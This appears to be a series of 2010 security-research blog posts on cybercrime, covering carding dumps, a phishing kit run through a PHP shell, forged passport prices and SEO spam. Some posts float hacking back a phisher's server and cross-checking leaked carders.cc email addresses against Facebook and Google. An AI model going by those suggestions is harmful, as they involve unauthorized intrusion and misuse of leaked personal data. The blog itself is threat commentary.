Jeah! Free AWS EC2 instances soon! :-)

Obviously AWS plans to offer free micro EC2 instances soon! This sounds promising …

I’m quite curious how this offer is used by the underground economy. At least, you need a valid credit card for signing up.

Hackers, Fraudsters and Botnets: Tackling the Problem of Cyber Crime

The australian Standing Committee on Communications of the House of Representatives published in June 2010 a report about cybercrime. The set of pdfs can be downloaded here.

Google Talk on Blackhat spam SEO

Provided by zscaler:

SHADOWS IN THE CLOUD: Investigating Cyber Espionage 2.0

This is an interesting PDF published a few months ago. So far, it has almost nothing to do with the “cloud” but more with different technologies storing data.

Spam comments selling new CC dumps

Probably a bot posted a comment on this posting about carders.cc with the intention to sell some new dumps. I think for spammers the search for “carders.cc” is a great opportunity to increase selling rates.

This comment was not marked as spam by wordpress!

Gamers at Risk?

There have been several blog reports about the risks of game console networks. I’ll dig deeper into this topic during the next weeks and months I think …

Real-Time Phisher Tracking

For the real weekend feeling, the weekly phishing mail shouldn’t be absent. Hence, today I wonna show you how real-time phisher tracking could work …

First of all, I received this email today which pretty much looks like a poorly written phishing email. Nothing strange so far … I had a closer look on what these guys want from the potential victims:

WTF? Are they insane? I mean, they cannot request more than 50 different TANs. For me this was a reason to dig a little bit deeper.

Apparently, they used a PHP-shell for administration of the phishing kit and the underlying system. These shells are quite popular because the phisher does not have to get any SSH account etc … just upload a PHP-shell. Now, it’s quite easy to have a look at the PHP files the phisher used for his attack:

Obviously the phishing kit is poorly written PHP code which greps all the POST data and transfers it to two different email accounts.

If you get access to the PHP-shell it would be possible to change the email adresses and redirect all the phished information to your email account. Furthermore, it would be possible to install a drive-by kit instead of the PHP-shell for compromising the phishers system. There are several possibilities one could use to gather furher information about the bad guys … however it is always a question whether it is legal or not. This strongly depends on the jurisdiction you are acting in …

CARO 2010 Workshop Slides

Check out the slides of the CARO 2010 Workshop in Helsinki here.

Some statistics about the carders.cc ownage

I found some nice statistics about the used email addresses and TLDs of the carders.cc customers. As you might have noticed, the dump is out there in the wild, available for download.

Search hacked carders.cc dump for interesting attributes

Most of my readers probably know already that carders.cc got owned. This time, the german heise magazine was quite fast in reporting. So, the database dump is out in the wild and probably can be found on several hosting possibilities. Thedarkvisitor.com had a nice idea about crawling this dump for IP addresses located in China. What about testing the email addresses against Facebook? Or Google?

Russia Ruling Malware Exploit Kit Market

The latest report from M86 Security reveals that Russia is the leading market for automated malware exploit kits which are widely sold over the Internet to data thieves and phishers. Does this really make you wonder?

BTW: This post is dedicated to the new guys in our group focusing on WETs

Badboys abuse Microsoft pages for selling stolen credit card information

I recently made some research on drop boxes for stolen credit card information and by accident came across this google search result (I modified the picture!):

On the same search, several Microsoft domains came up. Although the information is already deleted from the Microsoft pages, the Google Cache keeps the results. Obviously, MS has huge problems with keeping their pages clean from spam.

HITB stuff released

I always read the HITB materials from the conferences as well as the magazine. Hence, I just flew over the second HITB ezine that can be downloaded here. So here’s the content of this ezine:

If you still have time, check out the materials of the HITB 2010 conference.

What’s a real BlackHat SEO?

This is indeed an interesting view on the SEO business from a completely different point of view. SEO is war, but there are rules in this war that have to be taken into consideration if you plan to win this war.

Fireshark – Linking the malicious web

Fireshark is a tool, made up of a Firefox plugin and a set of postprocessing scripts that allows you to capture web traffic from the core of your web browser, enabling you to log events and download content to disk for post-process analysis.

Kewl, anyone already tried this?

Sophos publishes research paper on SEO attacks

If you ask me, it’s time for more papers like this one. All the mentioned words and phrases of SEO attacks are nowadays pretty well known to the public, but only a few know exactly what’s behind the curtain when we talk about SEO. Sophos tries to bring light into this darkness …

PandaLabs Q1 2010 Report

The report can be downloaded here – contains a lot of information about Operation Mariposa and other stuff.

Prices for Faked German Passports Increased

A few days ago I stumbled across illegal offers for faked german passports and I was really astonished. A few years ago I saw prices ranging from 50-100 Euros for one passport. Apparently times have changed!

Nowadays, for a complete passport based on faked data you have to pay around 850,- Euros. This includes shipping and escrow.

The sophisticated version costs around 1100,- Euros (including shipping and escrow) and has an additional feature: The information used to create the faked passport are based on real data. The authors claim that this version can also be used in cases the german credit investigation company (schufa) is included. Of course, discount is provided if you order more than 2 passports.

This whole underground industry is focusing on profit only! One last thing I have to add: The authors also claim that the german postident process can be faked with the help of the sophisticated passports. Scary!